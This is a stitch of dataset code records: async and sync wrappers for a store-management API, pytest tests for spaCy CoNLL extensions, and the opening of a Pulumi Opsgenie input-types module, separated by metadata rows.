return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(CreateStore)
async def create_store_async(body: Optional[StoreCreate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = CreateStore.create(
body=body,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(DeletePublishedStore)
def delete_published_store(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = DeletePublishedStore.create(
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(DeletePublishedStore)
async def delete_published_store_async(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = DeletePublishedStore.create(
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(DeleteStore)
def delete_store(store_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = DeleteStore.create(
store_id=store_id,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(DeleteStore)
async def delete_store_async(store_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = DeleteStore.create(
store_id=store_id,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(ExportStore)
def export_store(store_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = ExportStore.create(
store_id=store_id,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(ExportStore)
async def export_store_async(store_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = ExportStore.create(
store_id=store_id,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetPublishedStore)
def get_published_store(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetPublishedStore.create(
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetPublishedStore)
async def get_published_store_async(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetPublishedStore.create(
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetPublishedStoreBackup)
def get_published_store_backup(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetPublishedStoreBackup.create(
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetPublishedStoreBackup)
async def get_published_store_backup_async(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetPublishedStoreBackup.create(
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetStore)
def get_store(store_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetStore.create(
store_id=store_id,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetStore)
async def get_store_async(store_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetStore.create(
store_id=store_id,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(ImportStore)
def import_store(file: Optional[Any] = None, store_id: Optional[str] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = ImportStore.create(
file=file,
store_id=store_id,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(ImportStore)
async def import_store_async(file: Optional[Any] = None, store_id: Optional[str] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = ImportStore.create(
file=file,
store_id=store_id,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(ListStores)
def list_stores(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = ListStores.create(
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(ListStores)
async def list_stores_async(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = ListStores.create(
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(PublicListStores)
def public_list_stores(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = PublicListStores.create(
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(PublicListStores)
async def public_list_stores_async(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = PublicListStores.create(
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(RollbackPublishedStore)
def rollback_published_store(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = RollbackPublishedStore.create(
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(RollbackPublishedStore)
async def rollback_published_store_async(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = RollbackPublishedStore.create(
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(UpdateStore)
def update_store(store_id: str, body: Optional[StoreUpdate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = UpdateStore.create(
store_id=store_id,
body=body,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(UpdateStore)
async def update_store_async(store_id: str, body: Optional[StoreUpdate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = UpdateStore.create(
store_id=store_id,
body=body,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
| 37.598958
| 187
| 0.716858
| 1,722
| 14,438
| 5.785714
| 0.069106
| 0.133092
| 0.093948
| 0.062632
| 0.832079
| 0.818428
| 0.818428
| 0.818428
| 0.808993
| 0.808993
| 0
| 0.000342
| 0.190331
| 14,438
| 383
| 188
| 37.697128
| 0.851925
| 0.053054
| 0
| 0.747541
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042623
| false
| 0
| 0.101639
| 0
| 0.314754
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ba6317cb30c60ef5c0bdfa9d2a26ee0cc14ff068
| 4,171
|
py
|
Python
|
spacy_conll/tests/test_spacy_stanfordnlp_has_extension.py
|
KoichiYasuoka/spacy_conll
|
b9791a2cdbddde060fac494a6d6b2bd0042496ad
|
[
"BSD-2-Clause"
] | null | null | null |
spacy_conll/tests/test_spacy_stanfordnlp_has_extension.py
|
KoichiYasuoka/spacy_conll
|
b9791a2cdbddde060fac494a6d6b2bd0042496ad
|
[
"BSD-2-Clause"
] | null | null | null |
spacy_conll/tests/test_spacy_stanfordnlp_has_extension.py
|
KoichiYasuoka/spacy_conll
|
b9791a2cdbddde060fac494a6d6b2bd0042496ad
|
[
"BSD-2-Clause"
] | null | null | null |
# Doc: single sentence
def test_doc_has_conll_str_single_sentence(spacy_stanfordnlp_en_with_formatter, single_string_single_sentence):
doc = spacy_stanfordnlp_en_with_formatter(single_string_single_sentence)
assert doc.has_extension('conll_str')
assert doc._.conll_str is not None
assert isinstance(doc._.conll_str, str)
def test_doc_has_conll_str_headers_single_sentence(spacy_stanfordnlp_en_with_formatter, single_string_single_sentence):
doc = spacy_stanfordnlp_en_with_formatter(single_string_single_sentence)
assert doc.has_extension('conll_str_headers')
assert doc._.conll_str_headers is not None
assert isinstance(doc._.conll_str_headers, str)
def test_doc_has_conll_single_sentence(spacy_stanfordnlp_en_with_formatter, single_string_single_sentence):
doc = spacy_stanfordnlp_en_with_formatter(single_string_single_sentence)
assert doc.has_extension('conll')
assert doc._.conll is not None
assert isinstance(doc._.conll, list)
# Doc: multi-sentence
def test_doc_has_conll_str_multi_sentence(spacy_stanfordnlp_en_with_formatter, single_string_multi_sentence):
doc = spacy_stanfordnlp_en_with_formatter(single_string_multi_sentence)
assert doc.has_extension('conll_str')
assert doc._.conll_str is not None
assert isinstance(doc._.conll_str, str)
def test_doc_has_conll_str_headers_multi_sentence(spacy_stanfordnlp_en_with_formatter, single_string_multi_sentence):
doc = spacy_stanfordnlp_en_with_formatter(single_string_multi_sentence)
assert doc.has_extension('conll_str_headers')
assert doc._.conll_str_headers is not None
assert isinstance(doc._.conll_str_headers, str)
def test_doc_has_conll_multi_sentence(spacy_stanfordnlp_en_with_formatter, single_string_multi_sentence):
doc = spacy_stanfordnlp_en_with_formatter(single_string_multi_sentence)
assert doc.has_extension('conll')
assert doc._.conll is not None
assert isinstance(doc._.conll, list)
# Sents
def test_sents_has_conll_str_single_sentence(spacy_stanfordnlp_en_with_formatter, single_string_single_sentence):
doc = spacy_stanfordnlp_en_with_formatter(single_string_single_sentence)
for sent in doc.sents:
assert sent.has_extension('conll_str')
assert sent._.conll_str is not None
assert isinstance(sent._.conll_str, str)
def test_sents_has_conll_str_headers_single_sentence(spacy_stanfordnlp_en_with_formatter, single_string_single_sentence):
doc = spacy_stanfordnlp_en_with_formatter(single_string_single_sentence)
for sent in doc.sents:
assert sent.has_extension('conll_str_headers')
assert sent._.conll_str_headers is not None
assert isinstance(sent._.conll_str_headers, str)
def test_sents_has_conll_single_sentence(spacy_stanfordnlp_en_with_formatter, single_string_single_sentence):
doc = spacy_stanfordnlp_en_with_formatter(single_string_single_sentence)
for sent in doc.sents:
assert sent.has_extension('conll')
assert sent._.conll is not None
assert isinstance(sent._.conll, list)
# Sents: multi-sentence
def test_sents_has_conll_str_multi_sentence(spacy_stanfordnlp_en_with_formatter, single_string_multi_sentence):
doc = spacy_stanfordnlp_en_with_formatter(single_string_multi_sentence)
for sent in doc.sents:
assert sent.has_extension('conll_str')
assert sent._.conll_str is not None
assert isinstance(sent._.conll_str, str)
def test_sents_has_conll_str_headers_multi_sentence(spacy_stanfordnlp_en_with_formatter, single_string_multi_sentence):
doc = spacy_stanfordnlp_en_with_formatter(single_string_multi_sentence)
for sent in doc.sents:
assert sent.has_extension('conll_str_headers')
assert sent._.conll_str_headers is not None
assert isinstance(sent._.conll_str_headers, str)
def test_sents_has_conll_multi_sentence(spacy_stanfordnlp_en_with_formatter, single_string_multi_sentence):
doc = spacy_stanfordnlp_en_with_formatter(single_string_multi_sentence)
for sent in doc.sents:
assert sent.has_extension('conll')
assert sent._.conll is not None
assert isinstance(sent._.conll, list)
| 50.253012
| 121
| 0.813714
| 592
| 4,171
| 5.206081
| 0.045608
| 0.083063
| 0.140169
| 0.171317
| 0.987021
| 0.987021
| 0.979234
| 0.967554
| 0.967554
| 0.967554
| 0
| 0
| 0.126588
| 4,171
| 82
| 122
| 50.865854
| 0.846006
| 0.016303
| 0
| 0.818182
| 0
| 0
| 0.030259
| 0
| 0
| 0
| 0
| 0
| 0.545455
| 1
| 0.181818
| false
| 0
| 0
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
bac541d4a0291cfe28ce97ab146bb84b50abe5d4
| 166,815
|
py
|
Python
|
sdk/python/pulumi_opsgenie/_inputs.py
|
pulumi/pulumi-opsgenie
|
4bc7d0cbb5b0437c59422a5977a61468baa2c4a7
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-12-01T20:57:42.000Z
|
2021-12-01T20:57:42.000Z
|
sdk/python/pulumi_opsgenie/_inputs.py
|
pulumi/pulumi-opsgenie
|
4bc7d0cbb5b0437c59422a5977a61468baa2c4a7
|
[
"ECL-2.0",
"Apache-2.0"
] | 34
|
2021-02-03T20:15:32.000Z
|
2022-03-25T19:57:20.000Z
|
sdk/python/pulumi_opsgenie/_inputs.py
|
pulumi/pulumi-opsgenie
|
4bc7d0cbb5b0437c59422a5977a61468baa2c4a7
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2021-07-08T15:16:09.000Z
|
2021-07-20T11:12:44.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = [
'AlertPolicyFilterArgs',
'AlertPolicyFilterConditionArgs',
'AlertPolicyResponderArgs',
'AlertPolicyTimeRestrictionArgs',
'AlertPolicyTimeRestrictionRestrictionArgs',
'ApiIntegrationResponderArgs',
'EmailIntegrationResponderArgs',
'EscalationRepeatArgs',
'EscalationRuleArgs',
'EscalationRuleRecipientArgs',
'IncidentTemplateStakeholderPropertyArgs',
'IntegrationActionAcknowledgeArgs',
'IntegrationActionAcknowledgeFilterArgs',
'IntegrationActionAcknowledgeFilterConditionArgs',
'IntegrationActionAddNoteArgs',
'IntegrationActionAddNoteFilterArgs',
'IntegrationActionAddNoteFilterConditionArgs',
'IntegrationActionCloseArgs',
'IntegrationActionCloseFilterArgs',
'IntegrationActionCloseFilterConditionArgs',
'IntegrationActionCreateArgs',
'IntegrationActionCreateFilterArgs',
'IntegrationActionCreateFilterConditionArgs',
'IntegrationActionCreateResponderArgs',
'IntegrationActionIgnoreArgs',
'IntegrationActionIgnoreFilterArgs',
'IntegrationActionIgnoreFilterConditionArgs',
'MaintenanceRuleArgs',
'MaintenanceRuleEntityArgs',
'MaintenanceTimeArgs',
'NotificationPolicyAutoCloseActionArgs',
'NotificationPolicyAutoCloseActionDurationArgs',
'NotificationPolicyAutoRestartActionArgs',
'NotificationPolicyAutoRestartActionDurationArgs',
'NotificationPolicyDeDuplicationActionArgs',
'NotificationPolicyDeDuplicationActionDurationArgs',
'NotificationPolicyDelayActionArgs',
'NotificationPolicyDelayActionDurationArgs',
'NotificationPolicyFilterArgs',
'NotificationPolicyFilterConditionArgs',
'NotificationPolicyTimeRestrictionArgs',
'NotificationPolicyTimeRestrictionRestrictionArgs',
'NotificationRuleCriteriaArgs',
'NotificationRuleCriteriaConditionArgs',
'NotificationRuleRepeatArgs',
'NotificationRuleScheduleArgs',
'NotificationRuleStepArgs',
'NotificationRuleStepContactArgs',
'NotificationRuleTimeRestrictionArgs',
'NotificationRuleTimeRestrictionRestrictionArgs',
'ScheduleRotationParticipantArgs',
'ScheduleRotationTimeRestrictionArgs',
'ScheduleRotationTimeRestrictionRestrictionArgs',
'ServiceIncidentRuleIncidentRuleArgs',
'ServiceIncidentRuleIncidentRuleConditionArgs',
'ServiceIncidentRuleIncidentRuleIncidentPropertyArgs',
'ServiceIncidentRuleIncidentRuleIncidentPropertyStakeholderPropertyArgs',
'TeamMemberArgs',
'TeamRoutingRuleCriteriaArgs',
'TeamRoutingRuleCriteriaConditionArgs',
'TeamRoutingRuleNotifyArgs',
'TeamRoutingRuleTimeRestrictionArgs',
'TeamRoutingRuleTimeRestrictionRestrictionArgs',
'UserUserAddressArgs',
'GetEscalationRepeatArgs',
'GetEscalationRuleArgs',
'GetEscalationRuleRecipientArgs',
'GetTeamMemberArgs',
]
@pulumi.input_type
class AlertPolicyFilterArgs:
def __init__(__self__, *,
conditions: Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyFilterConditionArgs']]]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input['AlertPolicyFilterConditionArgs']]] conditions: Conditions applied to filter. This is a block, structure is documented below.
:param pulumi.Input[str] type: Type of responder. Acceptable values are: `user` or `team`
"""
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyFilterConditionArgs']]]]:
"""
Conditions applied to filter. This is a block, structure is documented below.
"""
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyFilterConditionArgs']]]]):
pulumi.set(self, "conditions", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
Type of responder. Acceptable values are: `user` or `team`
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class AlertPolicyFilterConditionArgs:
def __init__(__self__, *,
field: pulumi.Input[str],
operation: pulumi.Input[str],
expected_value: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
not_: Optional[pulumi.Input[bool]] = None,
order: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[str] field: Specifies which alert field will be used in condition. Possible values are `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`
:param pulumi.Input[str] operation: It is the operation that will be executed for the given field and key. Possible operations are `matches`, `contains`, `starts-with`, `ends-with`, `equals`, `contains-key`, `contains-value`, `greater-than`, `less-than`, `is-empty`, `equals-ignore-whitespace`.
:param pulumi.Input[str] expected_value: User defined value that will be compared with alert field according to the operation. Default: empty string
:param pulumi.Input[str] key: If `field` is set as extra-properties, key could be used for key-value pair
:param pulumi.Input[bool] not_: Indicates behaviour of the given operation. Default: `false`
:param pulumi.Input[int] order: Order of the condition in conditions list
"""
pulumi.set(__self__, "field", field)
pulumi.set(__self__, "operation", operation)
if expected_value is not None:
pulumi.set(__self__, "expected_value", expected_value)
if key is not None:
pulumi.set(__self__, "key", key)
if not_ is not None:
pulumi.set(__self__, "not_", not_)
if order is not None:
pulumi.set(__self__, "order", order)
@property
@pulumi.getter
def field(self) -> pulumi.Input[str]:
"""
Specifies which alert field will be used in condition. Possible values are `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`
"""
return pulumi.get(self, "field")
@field.setter
def field(self, value: pulumi.Input[str]):
pulumi.set(self, "field", value)
@property
@pulumi.getter
def operation(self) -> pulumi.Input[str]:
"""
It is the operation that will be executed for the given field and key. Possible operations are `matches`, `contains`, `starts-with`, `ends-with`, `equals`, `contains-key`, `contains-value`, `greater-than`, `less-than`, `is-empty`, `equals-ignore-whitespace`.
"""
return pulumi.get(self, "operation")
@operation.setter
def operation(self, value: pulumi.Input[str]):
pulumi.set(self, "operation", value)
@property
@pulumi.getter(name="expectedValue")
def expected_value(self) -> Optional[pulumi.Input[str]]:
"""
User defined value that will be compared with alert field according to the operation. Default: empty string
"""
return pulumi.get(self, "expected_value")
@expected_value.setter
def expected_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "expected_value", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
If `field` is set as extra-properties, key could be used for key-value pair
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="not")
def not_(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates behaviour of the given operation. Default: `false`
"""
return pulumi.get(self, "not_")
@not_.setter
def not_(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "not_", value)
@property
@pulumi.getter
def order(self) -> Optional[pulumi.Input[int]]:
"""
Order of the condition in conditions list
"""
return pulumi.get(self, "order")
@order.setter
def order(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "order", value)
@pulumi.input_type
class AlertPolicyResponderArgs:
def __init__(__self__, *,
id: pulumi.Input[str],
type: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] id: ID of the responder
:param pulumi.Input[str] type: Type of responder. Acceptable values are: `user` or `team`
:param pulumi.Input[str] name: Name of the responder
:param pulumi.Input[str] username: Username of the responder
"""
pulumi.set(__self__, "id", id)
pulumi.set(__self__, "type", type)
if name is not None:
pulumi.set(__self__, "name", name)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> pulumi.Input[str]:
"""
ID of the responder
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: pulumi.Input[str]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of responder. Acceptable values are: `user` or `team`
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the responder
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
"""
Username of the responder
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
@pulumi.input_type
class AlertPolicyTimeRestrictionArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
restrictions: Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyTimeRestrictionRestrictionArgs']]]] = None):
"""
:param pulumi.Input[str] type: Type of responder. Acceptable values are: `user` or `team`
:param pulumi.Input[Sequence[pulumi.Input['AlertPolicyTimeRestrictionRestrictionArgs']]] restrictions: List of days and hours definitions for field type = `weekday-and-time-of-day`. This is a block, structure is documented below.
"""
pulumi.set(__self__, "type", type)
if restrictions is not None:
pulumi.set(__self__, "restrictions", restrictions)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of responder. Acceptable values are: `user` or `team`
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def restrictions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyTimeRestrictionRestrictionArgs']]]]:
"""
List of days and hours definitions for field type = `weekday-and-time-of-day`. This is a block, structure is documented below.
"""
return pulumi.get(self, "restrictions")
@restrictions.setter
def restrictions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AlertPolicyTimeRestrictionRestrictionArgs']]]]):
pulumi.set(self, "restrictions", value)
@pulumi.input_type
class AlertPolicyTimeRestrictionRestrictionArgs:
def __init__(__self__, *,
end_day: pulumi.Input[str],
end_hour: pulumi.Input[int],
end_min: pulumi.Input[int],
start_day: pulumi.Input[str],
start_hour: pulumi.Input[int],
start_min: pulumi.Input[int]):
"""
:param pulumi.Input[str] end_day: Ending day of restriction (eg. `wednesday`)
:param pulumi.Input[int] end_hour: Ending hour of restriction.
:param pulumi.Input[int] end_min: Ending minute of restriction on defined `end_hour`
:param pulumi.Input[str] start_day: Starting day of restriction (eg. `monday`)
:param pulumi.Input[int] start_hour: Starting hour of restriction.
:param pulumi.Input[int] start_min: Staring minute of restriction on defined `start_hour`
"""
pulumi.set(__self__, "end_day", end_day)
pulumi.set(__self__, "end_hour", end_hour)
pulumi.set(__self__, "end_min", end_min)
pulumi.set(__self__, "start_day", start_day)
pulumi.set(__self__, "start_hour", start_hour)
pulumi.set(__self__, "start_min", start_min)
@property
@pulumi.getter(name="endDay")
def end_day(self) -> pulumi.Input[str]:
"""
Ending day of restriction (eg. `wednesday`)
"""
return pulumi.get(self, "end_day")
@end_day.setter
def end_day(self, value: pulumi.Input[str]):
pulumi.set(self, "end_day", value)
@property
@pulumi.getter(name="endHour")
def end_hour(self) -> pulumi.Input[int]:
"""
Ending hour of restriction.
"""
return pulumi.get(self, "end_hour")
@end_hour.setter
def end_hour(self, value: pulumi.Input[int]):
pulumi.set(self, "end_hour", value)
@property
@pulumi.getter(name="endMin")
def end_min(self) -> pulumi.Input[int]:
"""
Ending minute of restriction on defined `end_hour`
"""
return pulumi.get(self, "end_min")
@end_min.setter
def end_min(self, value: pulumi.Input[int]):
pulumi.set(self, "end_min", value)
@property
@pulumi.getter(name="startDay")
def start_day(self) -> pulumi.Input[str]:
"""
Starting day of restriction (eg. `monday`)
"""
return pulumi.get(self, "start_day")
@start_day.setter
def start_day(self, value: pulumi.Input[str]):
pulumi.set(self, "start_day", value)
@property
@pulumi.getter(name="startHour")
def start_hour(self) -> pulumi.Input[int]:
"""
Starting hour of restriction.
"""
return pulumi.get(self, "start_hour")
@start_hour.setter
def start_hour(self, value: pulumi.Input[int]):
pulumi.set(self, "start_hour", value)
@property
@pulumi.getter(name="startMin")
def start_min(self) -> pulumi.Input[int]:
"""
Staring minute of restriction on defined `start_hour`
"""
return pulumi.get(self, "start_min")
@start_min.setter
def start_min(self, value: pulumi.Input[int]):
pulumi.set(self, "start_min", value)
@pulumi.input_type
class ApiIntegrationResponderArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] id: The id of the responder.
:param pulumi.Input[str] type: The responder type.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
The id of the responder.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The responder type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class EmailIntegrationResponderArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] id: The id of the responder.
:param pulumi.Input[str] type: The responder type.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
The id of the responder.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The responder type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class EscalationRepeatArgs:
def __init__(__self__, *,
close_alert_after_all: Optional[pulumi.Input[bool]] = None,
count: Optional[pulumi.Input[int]] = None,
reset_recipient_states: Optional[pulumi.Input[bool]] = None,
wait_interval: Optional[pulumi.Input[int]] = None):
if close_alert_after_all is not None:
pulumi.set(__self__, "close_alert_after_all", close_alert_after_all)
if count is not None:
pulumi.set(__self__, "count", count)
if reset_recipient_states is not None:
pulumi.set(__self__, "reset_recipient_states", reset_recipient_states)
if wait_interval is not None:
pulumi.set(__self__, "wait_interval", wait_interval)
@property
@pulumi.getter(name="closeAlertAfterAll")
def close_alert_after_all(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "close_alert_after_all")
@close_alert_after_all.setter
def close_alert_after_all(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "close_alert_after_all", value)
@property
@pulumi.getter
def count(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "count")
@count.setter
def count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "count", value)
@property
@pulumi.getter(name="resetRecipientStates")
def reset_recipient_states(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "reset_recipient_states")
@reset_recipient_states.setter
def reset_recipient_states(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "reset_recipient_states", value)
@property
